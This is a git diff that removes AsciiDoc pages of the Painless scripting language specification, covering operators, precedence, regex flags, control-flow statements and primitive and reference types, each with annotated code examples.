-[cols="<1,^1,^1,^1,^1,^1,^1"] -|==== -| | byte | short | char | int | long | def -| byte | int | int | int | int | long | def -| short | int | int | int | int | long | def -| char | int | int | int | int | long | def -| int | int | int | int | int | long | def -| long | long | long | long | long | long | def -| def | def | def | def | def | def | def -|==== - -*Examples* - -* Bitwise or with different integer types. -+ -[source,Painless] ----- -int i = 5 | 6; <1> -long l = i | 8L; <2> ----- -+ -<1> declare `int i`; - bitwise or `int 5` and `int 6` -> `int 7`; - store `int 7` in `i` -<2> declare `long l` - load from `int i` -> `int 7`; - promote `int 7` and `long 8`: result `long`; - implicit cast `int 7` to `long 7` -> `long 7`; - bitwise or `long 7` and `long 8` -> `long 15`; - store `long 15` to `l` -+ -* Bitwise or with the `def` type. -+ -[source,Painless] ----- -def x = 5 ^ 6; <1> -def y = x ^ 8; <2> ----- -<1> declare `def x`; - bitwise or `int 5` and `int 6` -> `int 7`; - implicit cast `int 7` to `def` -> `def`; - store `def` in `x` -<2> declare `def y`; - load from `x` -> `def`; - implicit cast `def` to `int 7`; - bitwise or `int 7` and `int 8` -> `int 15`; - implicit cast `int 15` to `def` -> `def`; - store `def` to `y` diff --git a/docs/painless/painless-lang-spec/painless-operators-reference.asciidoc b/docs/painless/painless-lang-spec/painless-operators-reference.asciidoc deleted file mode 100644 index dbdae92b270..00000000000 --- a/docs/painless/painless-lang-spec/painless-operators-reference.asciidoc +++ /dev/null @@ -1,774 +0,0 @@ -[[painless-operators-reference]] -=== Operators: Reference - -[[method-call-operator]] -==== Method Call - -Use the `method call operator '()'` to call a member method on a -<> value. Implicit -<> is evaluated as necessary per argument -during the method call. When a method call is made on a target `def` type value, -the parameters and return type value are considered to also be of the `def` type -and are evaluated at run-time. - -An overloaded method is one that shares the same name with two or more methods. -A method is overloaded based on arity where the same name is re-used for -multiple methods as long as the number of parameters differs. - -*Errors* - -* If the reference type value is `null`. -* If the member method name doesn't exist for a given reference type value. -* If the number of arguments passed in is different from the number of specified - parameters. -* If the arguments cannot be implicitly cast or implicitly boxed/unboxed to the - correct type values for the parameters. - -*Grammar* - -[source,ANTLR4] ----- -method_call: '.' ID arguments; -arguments: '(' (expression (',' expression)*)? ')'; ----- - -*Examples* - -* Method calls on different reference types. -+ -[source,Painless] ----- -Map m = new HashMap(); <1> -m.put(1, 2); <2> -int z = m.get(1); <3> -def d = new ArrayList(); <4> -d.add(1); <5> -int i = Integer.parseInt(d.get(0).toString()); <6> ----- -+ -<1> declare `Map m`; - allocate `HashMap` instance -> `HashMap reference`; - store `HashMap reference` to `m` -<2> load from `m` -> `Map reference`; - implicit cast `int 1` to `def` -> `def`; - implicit cast `int 2` to `def` -> `def`; - call `put` on `Map reference` with arguments (`int 1`, `int 2`) -<3> declare `int z`; - load from `m` -> `Map reference`; - call `get` on `Map reference` with arguments (`int 1`) -> `def`; - implicit cast `def` to `int 2` -> `int 2`; - store `int 2` to `z` -<4> declare `def d`; - allocate `ArrayList` instance -> `ArrayList reference`; - implicit cast `ArrayList` to `def` -> `def`; - store `def` to `d` -<5> load from `d` -> `def`; - implicit cast `def` to `ArrayList reference` -> `ArrayList reference` - call `add` on `ArrayList reference` with arguments (`int 1`); -<6> declare `int i`; - load from `d` -> `def`; - implicit cast `def` to `ArrayList reference` -> `ArrayList reference` - call `get` on `ArrayList reference` with arguments (`int 1`) -> `def`; - implicit cast `def` to `Integer 1 reference` -> `Integer 1 reference`; - call `toString` on `Integer 1 reference` -> `String '1'`; - call `parseInt` on `Integer` with arguments (`String '1'`) -> `int 1`; - store `int 1` in `i`; - -[[field-access-operator]] -==== Field Access - -Use the `field access operator '.'` to store a value to or load a value from a -<> member field. - -*Errors* - -* If the reference type value is `null`. -* If the member field name doesn't exist for a given reference type value. - -*Grammar* - -[source,ANTLR4] ----- -field_access: '.' ID; ----- - -*Examples* - -The examples use the following reference type definition: - -[source,Painless] ----- -name: - Example - -non-static member fields: - * int x - * def y - * List z ----- - -* Field access with the `Example` type. -+ -[source,Painless] ----- -Example example = new Example(); <1> -example.x = 1; <2> -example.y = example.x; <3> -example.z = new ArrayList(); <4> -example.z.add(1); <5> -example.x = example.z.get(0); <6> ----- -+ -<1> declare `Example example`; - allocate `Example` instance -> `Example reference`; - store `Example reference` to `example` -<2> load from `example` -> `Example reference`; - store `int 1` to `x` of `Example reference` -<3> load from `example` -> `Example reference @0`; - load from `example` -> `Example reference @1`; - load from `x` of `Example reference @1` -> `int 1`; - implicit cast `int 1` to `def` -> `def`; - store `def` to `y` of `Example reference @0`; - (note `Example reference @0` and `Example reference @1` are the same) -<4> load from `example` -> `Example reference`; - allocate `ArrayList` instance -> `ArrayList reference`; - implicit cast `ArrayList reference` to `List reference` -> `List reference`; - store `List reference` to `z` of `Example reference` -<5> load from `example` -> `Example reference`; - load from `z` of `Example reference` -> `List reference`; - call `add` on `List reference` with arguments (`int 1`) -<6> load from `example` -> `Example reference @0`; - load from `example` -> `Example reference @1`; - load from `z` of `Example reference @1` -> `List reference`; - call `get` on `List reference` with arguments (`int 0`) -> `int 1`; - store `int 1` in `x` of `List reference @0`; - (note `Example reference @0` and `Example reference @1` are the same) - -[[null-safe-operator]] -==== Null Safe - -Use the `null safe operator '?.'` instead of the method call operator or field -access operator to ensure a reference type value is `non-null` before -a method call or field access. A `null` value will be returned if the reference -type value is `null`, otherwise the method call or field access is evaluated. - -*Errors* - -* If the method call return type value or the field access type value is not - a reference type value and is not implicitly castable to a reference type - value. - -*Grammar* - -[source,ANTLR4] ----- -null_safe: null_safe_method_call - | null_safe_field_access - ; - -null_safe_method_call: '?.' ID arguments; -arguments: '(' (expression (',' expression)*)? ')'; - -null_safe_field_access: '?.' ID; ----- - -*Examples* - -The examples use the following reference type definition: - -[source,Painless] ----- -name: - Example - -non-static member methods: - * List factory() - -non-static member fields: - * List x ----- - -* Null safe without a `null` value. -+ -[source,Painless] ----- -Example example = new Example(); <1> -List x = example?.factory(); <2> ----- -+ -<1> declare `Example example`; - allocate `Example` instance -> `Example reference`; - store `Example reference` to `example` -<2> declare `List x`; - load from `example` -> `Example reference`; - null safe call `factory` on `Example reference` -> `List reference`; - store `List reference` to `x`; -+ -* Null safe with a `null` value; -+ -[source,Painless] ----- -Example example = null; <1> -List x = example?.x; <2> ----- -<1> declare `Example example`; - store `null` to `example` -<2> declare `List x`; - load from `example` -> `Example reference`; - null safe access `x` on `Example reference` -> `null`; - store `null` to `x`; - (note the *null safe operator* returned `null` because `example` is `null`) - -[[list-initialization-operator]] -==== List Initialization - -Use the `list initialization operator '[]'` to allocate an `List` type instance -to the heap with a set of pre-defined values. Each value used to initialize the -`List` type instance is cast to a `def` type value upon insertion into the -`List` type instance using the `add` method. The order of the specified values -is maintained. - -*Grammar* - -[source,ANTLR4] ----- -list_initialization: '[' expression (',' expression)* ']' - | '[' ']'; ----- - -*Examples* - -* List initialization of an empty `List` type value. -+ -[source,Painless] ----- -List empty = []; <1> ----- -+ -<1> declare `List empty`; - allocate `ArrayList` instance -> `ArrayList reference`; - implicit cast `ArrayList reference` to `List reference` -> `List reference`; - store `List reference` to `empty` -+ -* List initialization with static values. -+ -[source,Painless] ----- -List list = [1, 2, 3]; <1> ----- -+ -<1> declare `List list`; - allocate `ArrayList` instance -> `ArrayList reference`; - call `add` on `ArrayList reference` with arguments(`int 1`); - call `add` on `ArrayList reference` with arguments(`int 2`); - call `add` on `ArrayList reference` with arguments(`int 3`); - implicit cast `ArrayList reference` to `List reference` -> `List reference`; - store `List reference` to `list` -+ -* List initialization with non-static values. -+ -[source,Painless] ----- -int i = 1; <1> -long l = 2L; <2> -float f = 3.0F; <3> -double d = 4.0; <4> -String s = "5"; <5> -List list = [i, l, f*d, s]; <6> ----- -+ -<1> declare `int i`; - store `int 1` to `i` -<2> declare `long l`; - store `long 2` to `l` -<3> declare `float f`; - store `float 3.0` to `f` -<4> declare `double d`; - store `double 4.0` to `d` -<5> declare `String s`; - store `String "5"` to `s` -<6> declare `List list`; - allocate `ArrayList` instance -> `ArrayList reference`; - load from `i` -> `int 1`; - call `add` on `ArrayList reference` with arguments(`int 1`); - load from `l` -> `long 2`; - call `add` on `ArrayList reference` with arguments(`long 2`); - load from `f` -> `float 3.0`; - load from `d` -> `double 4.0`; - promote `float 3.0` and `double 4.0`: result `double`; - implicit cast `float 3.0` to `double 3.0` -> `double 3.0`; - multiply `double 3.0` and `double 4.0` -> `double 12.0`; - call `add` on `ArrayList reference` with arguments(`double 12.0`); - load from `s` -> `String "5"`; - call `add` on `ArrayList reference` with arguments(`String "5"`); - implicit cast `ArrayList reference` to `List reference` -> `List reference`; - store `List reference` to `list` - -[[list-access-operator]] -==== List Access - -Use the `list access operator '[]'` as a shortcut for a `set` method call or -`get` method call made on a `List` type value. - -*Errors* - -* If a value other than a `List` type value is accessed. -* If a non-integer type value is used as an index for a `set` method call or - `get` method call. - -*Grammar* - -[source,ANTLR4] ----- -list_access: '[' expression ']' ----- - -*Examples* - -* List access with the `List` type. -+ -[source,Painless] ----- -List list = new ArrayList(); <1> -list.add(1); <2> -list.add(2); <3> -list.add(3); <4> -list[0] = 2; <5> -list[1] = 5; <6> -int x = list[0] + list[1]; <7> -int y = 1; <8> -int z = list[y]; <9> ----- -+ -<1> declare `List list`; - allocate `ArrayList` instance -> `ArrayList reference`; - implicit cast `ArrayList reference` to `List reference` -> `List reference`; - store `List reference` to `list` -<2> load from `list` -> `List reference`; - call `add` on `List reference` with arguments(`int 1`) -<3> load from `list` -> `List reference`; - call `add` on `List reference` with arguments(`int 2`) -<4> load from `list` -> `List reference`; - call `add` on `List reference` with arguments(`int 3`) -<5> load from `list` -> `List reference`; - call `set` on `List reference` with arguments(`int 0`, `int 2`) -<6> load from `list` -> `List reference`; - call `set` on `List reference` with arguments(`int 1`, `int 5`) -<7> declare `int x`; - load from `list` -> `List reference`; - call `get` on `List reference` with arguments(`int 0`) -> `def`; - implicit cast `def` to `int 2` -> `int 2`; - load from `list` -> `List reference`; - call `get` on `List reference` with arguments(`int 1`) -> `def`; - implicit cast `def` to `int 5` -> `int 5`; - add `int 2` and `int 5` -> `int 7`; - store `int 7` to `x` -<8> declare `int y`; - store `int 1` int `y` -<9> declare `int z`; - load from `list` -> `List reference`; - load from `y` -> `int 1`; - call `get` on `List reference` with arguments(`int 1`) -> `def`; - implicit cast `def` to `int 5` -> `int 5`; - store `int 5` to `z` -+ -* List access with the `def` type. -+ -[source,Painless] ----- -def d = new ArrayList(); <1> -d.add(1); <2> -d.add(2); <3> -d.add(3); <4> -d[0] = 2; <5> -d[1] = 5; <6> -def x = d[0] + d[1]; <7> -def y = 1; <8> -def z = d[y]; <9> ----- -+ -<1> declare `List d`; - allocate `ArrayList` instance -> `ArrayList reference`; - implicit cast `ArrayList reference` to `def` -> `def`; - store `def` to `d` -<2> load from `d` -> `def`; - implicit cast `def` to `ArrayList reference` -> `ArrayList reference`; - call `add` on `ArrayList reference` with arguments(`int 1`) -<3> load from `d` -> `def`; - implicit cast `def` to `ArrayList reference` -> `ArrayList reference`; - call `add` on `ArrayList reference` with arguments(`int 2`) -<4> load from `d` -> `def`; - implicit cast `def` to `ArrayList reference` -> `ArrayList reference`; - call `add` on `ArrayList reference` with arguments(`int 3`) -<5> load from `d` -> `def`; - implicit cast `def` to `ArrayList reference` -> `ArrayList reference`; - call `set` on `ArrayList reference` with arguments(`int 0`, `int 2`) -<6> load from `d` -> `def`; - implicit cast `def` to `ArrayList reference` -> `ArrayList reference`; - call `set` on `ArrayList reference` with arguments(`int 1`, `int 5`) -<7> declare `def x`; - load from `d` -> `def`; - implicit cast `def` to `ArrayList reference` -> `ArrayList reference`; - call `get` on `ArrayList reference` with arguments(`int 0`) -> `def`; - implicit cast `def` to `int 2` -> `int 2`; - load from `d` -> `def`; - implicit cast `def` to `ArrayList reference` -> `ArrayList reference`; - call `get` on `ArrayList reference` with arguments(`int 1`) -> `def`; - implicit cast `def` to `int 2` -> `int 2`; - add `int 2` and `int 5` -> `int 7`; - store `int 7` to `x` -<8> declare `int y`; - store `int 1` int `y` -<9> declare `int z`; - load from `d` -> `ArrayList reference`; - load from `y` -> `def`; - implicit cast `def` to `int 1` -> `int 1`; - call `get` on `ArrayList reference` with arguments(`int 1`) -> `def`; - store `def` to `z` - -[[map-initialization-operator]] -==== Map Initialization - -Use the `map initialization operator '[:]'` to allocate a `Map` type instance to -the heap with a set of pre-defined values. Each pair of values used to -initialize the `Map` type instance are cast to `def` type values upon insertion -into the `Map` type instance using the `put` method. - -*Grammar* - -[source,ANTLR4] ----- -map_initialization: '[' key_pair (',' key_pair)* ']' - | '[' ':' ']'; -key_pair: expression ':' expression ----- - -*Examples* - -* Map initialization of an empty `Map` type value. -+ -[source,Painless] ----- -Map empty = [:]; <1> ----- -+ -<1> declare `Map empty`; - allocate `HashMap` instance -> `HashMap reference`; - implicit cast `HashMap reference` to `Map reference` -> `Map reference`; - store `Map reference` to `empty` -+ -* Map initialization with static values. -+ -[source,Painless] ----- -Map map = [1:2, 3:4, 5:6]; <1> ----- -+ -<1> declare `Map map`; - allocate `HashMap` instance -> `HashMap reference`; - call `put` on `HashMap reference` with arguments(`int 1`, `int 2`); - call `put` on `HashMap reference` with arguments(`int 3`, `int 4`); - call `put` on `HashMap reference` with arguments(`int 5`, `int 6`); - implicit cast `HashMap reference` to `Map reference` -> `Map reference`; - store `Map reference` to `map` -+ -* Map initialization with non-static values. -+ -[source,Painless] ----- -byte b = 0; <1> -int i = 1; <2> -long l = 2L; <3> -float f = 3.0F; <4> -double d = 4.0; <5> -String s = "5"; <6> -Map map = [b:i, l:f*d, d:s]; <7> ----- -+ -<1> declare `byte b`; - store `byte 0` to `b` -<2> declare `int i`; - store `int 1` to `i` -<3> declare `long l`; - store `long 2` to `l` -<4> declare `float f`; - store `float 3.0` to `f` -<5> declare `double d`; - store `double 4.0` to `d` -<6> declare `String s`; - store `String "5"` to `s` -<7> declare `Map map`; - allocate `HashMap` instance -> `HashMap reference`; - load from `b` -> `byte 0`; - load from `i` -> `int 1`; - call `put` on `HashMap reference` with arguments(`byte 0`, `int 1`); - load from `l` -> `long 2`; - load from `f` -> `float 3.0`; - load from `d` -> `double 4.0`; - promote `float 3.0` and `double 4.0`: result `double`; - implicit cast `float 3.0` to `double 3.0` -> `double 3.0`; - multiply `double 3.0` and `double 4.0` -> `double 12.0`; - call `put` on `HashMap reference` with arguments(`long 2`, `double 12.0`); - load from `d` -> `double 4.0`; - load from `s` -> `String "5"`; - call `put` on `HashMap reference` with - arguments(`double 4.0`, `String "5"`); - implicit cast `HashMap reference` to `Map reference` -> `Map reference`; - store `Map reference` to `map` - -[[map-access-operator]] -==== Map Access - -Use the `map access operator '[]'` as a shortcut for a `put` method call or -`get` method call made on a `Map` type value. - -*Errors* - -* If a value other than a `Map` type value is accessed. - -*Grammar* -[source,ANTLR4] ----- -map_access: '[' expression ']' ----- - -*Examples* - -* Map access with the `Map` type. -+ -[source,Painless] ----- -Map map = new HashMap(); <1> -map['value2'] = 2; <2> -map['value5'] = 5; <3> -int x = map['value2'] + map['value5']; <4> -String y = 'value5'; <5> -int z = x[z]; <6> ----- -+ -<1> declare `Map map`; - allocate `HashMap` instance -> `HashMap reference`; - implicit cast `HashMap reference` to `Map reference` -> `Map reference`; - store `Map reference` to `map` -<2> load from `map` -> `Map reference`; - call `put` on `Map reference` with arguments(`String 'value2'`, `int 2`) -<3> load from `map` -> `Map reference`; - call `put` on `Map reference` with arguments(`String 'value5'`, `int 5`) -<4> declare `int x`; - load from `map` -> `Map reference`; - call `get` on `Map reference` with arguments(`String 'value2'`) -> `def`; - implicit cast `def` to `int 2` -> `int 2`; - load from `map` -> `Map reference`; - call `get` on `Map reference` with arguments(`String 'value5'`) -> `def`; - implicit cast `def` to `int 5` -> `int 5`; - add `int 2` and `int 5` -> `int 7`; - store `int 7` to `x` -<5> declare `String y`; - store `String 'value5'` to `y` -<6> declare `int z`; - load from `map` -> `Map reference`; - load from `y` -> `String 'value5'`; - call `get` on `Map reference` with arguments(`String 'value5'`) -> `def`; - implicit cast `def` to `int 5` -> `int 5`; - store `int 5` to `z` -+ -* Map access with the `def` type. -+ -[source,Painless] ----- -def d = new HashMap(); <1> -d['value2'] = 2; <2> -d['value5'] = 5; <3> -int x = d['value2'] + d['value5']; <4> -String y = 'value5'; <5> -def z = d[y]; <6> ----- -+ -<1> declare `def d`; - allocate `HashMap` instance -> `HashMap reference`; - implicit cast `HashMap reference` to `def` -> `def`; - store `def` to `d` -<2> load from `d` -> `def`; - implicit cast `def` to `HashMap reference` -> `HashMap reference`; - call `put` on `HashMap reference` with arguments(`String 'value2'`, `int 2`) -<3> load from `d` -> `def`; - implicit cast `def` to `HashMap reference` -> `HashMap reference`; - call `put` on `HashMap reference` with arguments(`String 'value5'`, `int 5`) -<4> declare `int x`; - load from `d` -> `def`; - implicit cast `def` to `HashMap reference` -> `HashMap reference`; - call `get` on `HashMap reference` with arguments(`String 'value2'`) - -> `def`; - implicit cast `def` to `int 2` -> `int 2`; - load from `d` -> `def`; - call `get` on `HashMap reference` with arguments(`String 'value5'`) - -> `def`; - implicit cast `def` to `int 5` -> `int 5`; - add `int 2` and `int 5` -> `int 7`; - store `int 7` to `x` -<5> declare `String y`; - store `String 'value5'` to `y` -<6> declare `def z`; - load from `d` -> `def`; - load from `y` -> `String 'value5'`; - call `get` on `HashMap reference` with arguments(`String 'value5'`) - -> `def`; - store `def` to `z` - -[[new-instance-operator]] -==== New Instance - -Use the `new instance operator 'new ()'` to allocate a -<> instance to the heap and call a specified -constructor. Implicit <> is evaluated as -necessary per argument during the constructor call. - -An overloaded constructor is one that shares the same name with two or more -constructors. A constructor is overloaded based on arity where the same -reference type name is re-used for multiple constructors as long as the number -of parameters differs. - -*Errors* - -* If the reference type name doesn't exist for instance allocation. -* If the number of arguments passed in is different from the number of specified - parameters. -* If the arguments cannot be implicitly cast or implicitly boxed/unboxed to the - correct type values for the parameters. - -*Grammar* - -[source,ANTLR4] ----- -new_instance: 'new' TYPE '(' (expression (',' expression)*)? ')'; ----- - -*Examples* - -* Allocation of new instances with different types. - -[source,Painless] ----- -Map m = new HashMap(); <1> -def d = new ArrayList(); <2> -def e = new HashMap(m); <3> ----- -<1> declare `Map m`; - allocate `HashMap` instance -> `HashMap reference`; - implicit cast `HashMap reference` to `Map reference` -> `Map reference`; - store `Map reference` to `m`; -<2> declare `def d`; - allocate `ArrayList` instance -> `ArrayList reference`; - implicit cast `ArrayList reference` to `def` -> `def`; - store `def` to `d`; -<3> declare `def e`; - load from `m` -> `Map reference`; - allocate `HashMap` instance with arguments (`Map reference`) - -> `HashMap reference`; - implicit cast `HashMap reference` to `def` -> `def`; - store `def` to `e`; - -[[string-concatenation-operator]] -==== String Concatenation - -Use the `string concatenation operator '+'` to concatenate two values together -where at least one of the values is a <>. - -*Grammar* - -[source,ANTLR4] ----- -concatenate: expression '+' expression; ----- - -*Examples* - -* String concatenation with different primitive types. -+ -[source,Painless] ----- -String x = "con"; <1> -String y = x + "cat"; <2> -String z = 4 + 5 + x; <3> ----- -+ -<1> declare `String x`; - store `String "con"` to `x`; -<2> declare `String y`; - load from `x` -> `String "con"`; - concat `String "con"` and `String "cat"` -> `String "concat"`; - store `String "concat"` to `y` -<3> declare `String z`; - add `int 4` and `int 5` -> `int 9`; - concat `int 9` and `String "9concat"`; - store `String "9concat"` to `z`; - (note the addition is done prior to the concatenation due to precedence and - associativity of the specific operations) -+ -* String concatenation with the `def` type. -+ -[source,Painless] ----- -def d = 2; <1> -d = "con" + d + "cat"; <2> ----- -+ -<1> declare `def`; - implicit cast `int 2` to `def` -> `def`; - store `def` in `d`; -<2> concat `String "con"` and `int 9` -> `String "con9"`; - concat `String "con9"` and `String "con"` -> `String "con9cat"` - implicit cast `String "con9cat"` to `def` -> `def`; - store `def` to `d`; - (note the switch in type of `d` from `int` to `String`) - -[[elvis-operator]] -==== Elvis - -An elvis consists of two expressions. The first expression is evaluated -with to check for a `null` value. If the first expression evaluates to -`null` then the second expression is evaluated and its value used. If the first -expression evaluates to `non-null` then the resultant value of the first -expression is used. Use the `elvis operator '?:'` as a shortcut for the -conditional operator. - -*Errors* - -* If the first expression or second expression cannot produce a `null` value. - -*Grammar* - -[source,ANTLR4] ----- -elvis: expression '?:' expression; ----- - -*Examples* - -* Elvis with different reference types. -+ -[source,Painless] ----- -List x = new ArrayList(); <1> -List y = x ?: new ArrayList(); <2> -y = null; <3> -List z = y ?: new ArrayList(); <4> ----- -+ -<1> declare `List x`; - allocate `ArrayList` instance -> `ArrayList reference`; - implicit cast `ArrayList reference` to `List reference` -> `List reference`; - store `List reference` to `x`; -<2> declare `List y`; - load `x` -> `List reference`; - `List reference` equals `null` -> `false`; - evaluate 1st expression: `List reference` -> `List reference`; - store `List reference` to `y` -<3> store `null` to `y`; -<4> declare `List z`; - load `y` -> `List reference`; - `List reference` equals `null` -> `true`; - evaluate 2nd expression: - allocate `ArrayList` instance -> `ArrayList reference`; - implicit cast `ArrayList reference` to `List reference` -> `List reference`; - store `List reference` to `z`; diff --git a/docs/painless/painless-lang-spec/painless-operators.asciidoc b/docs/painless/painless-lang-spec/painless-operators.asciidoc deleted file mode 100644 index b105f4ef6fa..00000000000 --- a/docs/painless/painless-lang-spec/painless-operators.asciidoc +++ /dev/null @@ -1,64 +0,0 @@ -[[painless-operators]] -=== Operators - -An operator is the most basic action that can be taken to evaluate values in a -script. An expression is one-to-many consecutive operations. Precedence is the -order in which an operator will be evaluated relative to another operator. -Associativity is the direction within an expression in which a specific operator -is evaluated. The following table lists all available operators: - -[cols="<6,<3,^3,^2,^4"] -|==== -| *Operator* | *Category* | *Symbol(s)* | *Precedence* | *Associativity* -| <> | <> | () | 0 | left -> right -| <> | <> | . () | 1 | left -> right -| <> | <> | . | 1 | left -> right -| <> | <> | ?. | 1 | left -> right -| <> | <> | () | 1 | left -> right -| <> | <> | [] {} | 1 | left -> right -| <> | <> | [] | 1 | left -> right -| <> | <> | . | 1 | left -> right -| <> | <> | [] | 1 | left -> right -| <> | <> | [] | 1 | left -> right -| <> | <> | [:] | 1 | left -> right -| <> | <> | [] | 1 | left -> right -| <> | <> | ++ | 1 | left -> right -| <> | <> | -- | 1 | left -> right -| <> | <> | ++ | 2 | right -> left -| <> | <> | -- | 2 | right -> left -| <> | <> | + | 2 | right -> left -| <> | <> | - | 2 | right -> left -| <> | <> | ! | 2 | right -> left -| <> | <> | ~ | 2 | right -> left -| <> | <> | () | 3 | right -> left -| <> | <> | new () | 3 | right -> left -| <> | <> | new [] | 3 | right -> left -| <> | <> | * | 4 | left -> right -| <> | <> | / | 4 | left -> right -| <> | <> | % | 4 | left -> right -| <> | <> | + | 5 | left -> right -| <> | <> | + | 5 | left -> right -| <> | <> | - | 5 | left -> right -| <> | <> | << | 6 | left -> right -| <> | <> | >> | 6 | left -> right -| <> | <> | >>> | 6 | left -> right -| <> | <> | > | 7 | left -> right -| <> | <> | >= | 7 | left -> right -| <> | <> | < | 7 | left -> right -| <> | <> | +++<=+++ | 7 | left -> right -| <> | <> | instanceof | 8 | left -> right -| <> | <> | == | 9 | left -> right -| <> | <> | != | 9 | left -> right -| <> | <> | === | 9 | left -> right -| <> | <> | !== | 9 | left -> right -| <> | <> | & | 10 | left -> right -| <> | <> | ^ | 11 | left -> right -| <> | <> | ^ | 11 | left -> right -| <> | <> | \| | 12 | left -> right -| <> | <> | && | 13 | left -> right -| <> | <> | \|\| | 14 | left -> right -| <> | <> | ? : | 15 | right -> left -| <> | <> | ?: | 16 | right -> left -| <> | <> | = | 17 | right -> left -| <> | <> | $= | 17 | right -> left -|==== diff --git a/docs/painless/painless-lang-spec/painless-regexes.asciidoc b/docs/painless/painless-lang-spec/painless-regexes.asciidoc deleted file mode 100644 index 962c4751aab..00000000000 --- a/docs/painless/painless-lang-spec/painless-regexes.asciidoc +++ /dev/null @@ -1,37 +0,0 @@ -[[painless-regexes]] -=== Regexes - -Regular expression constants are directly supported. To ensure fast performance, -this is the only mechanism for creating patterns. Regular expressions -are always constants and compiled efficiently a single time. - -[source,painless] ---------------------------------------------------------- -Pattern p = /[aeiou]/ ---------------------------------------------------------- - -WARNING: A poorly written regular expression can significantly slow performance. -If possible, avoid using regular expressions, particularly in frequently run -scripts. - -[[pattern-flags]] -==== Pattern flags - -You can define flags on patterns in Painless by adding characters after the -trailing `/` like `/foo/i` or `/foo \w #comment/iUx`. Painless exposes all of -the flags from Java's -https://docs.oracle.com/javase/8/docs/api/java/util/regex/Pattern.html[ -Pattern class] using these characters: - -[cols="<,<,<",options="header",] -|======================================================================= -| Character | Java Constant | Example -|`c` | CANON_EQ | `'å' ==~ /å/c` (open in hex editor to see) -|`i` | CASE_INSENSITIVE | `'A' ==~ /a/i` -|`l` | LITERAL | `'[a]' ==~ /[a]/l` -|`m` | MULTILINE | `'a\nb\nc' =~ /^b$/m` -|`s` | DOTALL (aka single line) | `'a\nb\nc' =~ /.b./s` -|`U` | UNICODE_CHARACTER_CLASS | `'Ɛ' ==~ /\\w/U` -|`u` | UNICODE_CASE | `'Ɛ' ==~ /ɛ/iu` -|`x` | COMMENTS (aka extended) | `'a' ==~ /a #comment/x` -|======================================================================= \ No newline at end of file diff --git a/docs/painless/painless-lang-spec/painless-scripts.asciidoc b/docs/painless/painless-lang-spec/painless-scripts.asciidoc deleted file mode 100644 index 6c01e6cfa98..00000000000 --- a/docs/painless/painless-lang-spec/painless-scripts.asciidoc +++ /dev/null @@ -1,6 +0,0 @@ -[[painless-scripts]] -=== Scripts - -Scripts are composed of one-to-many <> and are -run in a sandbox that determines what local variables are immediately available -along with what APIs are allowed. diff --git a/docs/painless/painless-lang-spec/painless-statements.asciidoc b/docs/painless/painless-lang-spec/painless-statements.asciidoc deleted file mode 100644 index b627507fa94..00000000000 --- a/docs/painless/painless-lang-spec/painless-statements.asciidoc +++ /dev/null @@ -1,57 +0,0 @@ -[[painless-statements]] -=== Statements - -Painless supports all of Java's https://docs.oracle.com/javase/tutorial/java/nutsandbolts/flow.html[ -control flow statements] except the `switch` statement. - -==== Conditional statements - -===== If / Else - -[source,painless] ---------------------------------------------------------- -if (doc[item].size() == 0) { - // do something if "item" is missing -} else if (doc[item].value == 'something') { - // do something if "item" value is: something -} else { - // do something else -} ---------------------------------------------------------- - -==== Loop statements - -===== For - -Painless also supports the `for in` syntax: - -[source,painless] ---------------------------------------------------------- -for (def item : list) { - // do something -} ---------------------------------------------------------- - -[source,painless] ---------------------------------------------------------- -for (item in list) { - // do something -} ---------------------------------------------------------- - -===== While -[source,painless] ---------------------------------------------------------- -while (ctx._source.item < condition) { - // do something -} ---------------------------------------------------------- - -===== Do-While -[source,painless] ---------------------------------------------------------- -do { - // do something -} -while (ctx._source.item < condition) ---------------------------------------------------------- diff --git a/docs/painless/painless-lang-spec/painless-types.asciidoc b/docs/painless/painless-lang-spec/painless-types.asciidoc deleted file mode 100644 index e58fec49d7c..00000000000 --- a/docs/painless/painless-lang-spec/painless-types.asciidoc +++ /dev/null @@ -1,473 +0,0 @@ -[[painless-types]] -=== Types - -A type is a classification of data used to define the properties of a value. -These properties specify what data a value represents and the rules for how a -value is evaluated during an <>. Each type -belongs to one of the following categories: <>, -<>, or <>. - -[[primitive-types]] -==== Primitive Types - -A primitive type represents basic data built natively into the JVM and is -allocated to non-heap memory. Declare a primitive type -<> or access a primitive type member field (from -a reference type instance), and assign it a primitive type value for evaluation -during later operations. The default value for a newly-declared primitive type -variable is listed as part of the definitions below. A primitive type value is -copied during an assignment or as an argument for a method/function call. - -A primitive type has a corresponding reference type (also known as a boxed -type). Use the <> or -<> on a primitive type value to -force evaluation as its corresponding reference type value. - -The following primitive types are available: - -[horizontal] -`byte`:: -8-bit, signed, two's complement integer -* range: [`-128`, `127`] -* default value: `0` -* reference type: `Byte` - -`short`:: -16-bit, signed, two's complement integer -* range: [`-32768`, `32767`] -* default value: `0` -* reference type: `Short` - -`char`:: -16-bit, unsigned, Unicode character -* range: [`0`, `65535`] -* default value: `0` or `\u0000` -* reference type: `Character` - -`int`:: -32-bit, signed, two's complement integer -* range: [`-2^31`, `2^31-1`] -* default value: `0` -* reference type: `Integer` - -`long`:: -64-bit, signed, two's complement integer -* range: [`-2^63`, `2^63-1`] -* default value: `0` -* reference type: `Long` - -`float`:: -32-bit, signed, single-precision, IEEE 754 floating point number -* default value: `0.0` -* reference type: `Float` - -`double`:: -64-bit, signed, double-precision, IEEE 754 floating point number -* default value: `0.0` -* reference type: `Double` - -`boolean`:: -logical quantity with two possible values of `true` and `false` -* default value: `false` -* reference type: `Boolean` - -*Examples* - -* Primitive types used in declaration, declaration and assignment. -+ -[source,Painless] ----- -int i = 1; <1> -double d; <2> -boolean b = true; <3> ----- -+ -<1> declare `int i`; - store `int 1` to `i` -<2> declare `double d`; - store default `double 0.0` to `d` -<3> declare `boolean b`; - store `boolean true` to `b` -+ -* Method call on a primitive type using the corresponding reference type. -+ -[source,Painless] ----- -int i = 1; <1> -i.toString(); <2> ----- -+ -<1> declare `int i`; - store `int 1` to `i` -<2> load from `i` -> `int 1`; - box `int 1` -> `Integer 1 reference`; - call `toString` on `Integer 1 reference` -> `String '1'` - -[[reference-types]] -==== Reference Types - -A reference type is a named construct (object), potentially representing -multiple pieces of data (member fields) and logic to manipulate that data -(member methods), defined as part of the application programming interface -(API) for scripts. - -A reference type instance is a single set of data for one reference type -object allocated to the heap. Use the -<> to allocate a reference type -instance. Use a reference type instance to load from, store to, and manipulate -complex data. - -A reference type value refers to a reference type instance, and multiple -reference type values may refer to the same reference type instance. A change to -a reference type instance will affect all reference type values referring to -that specific instance. - -Declare a reference type <> or access a reference -type member field (from a reference type instance), and assign it a reference -type value for evaluation during later 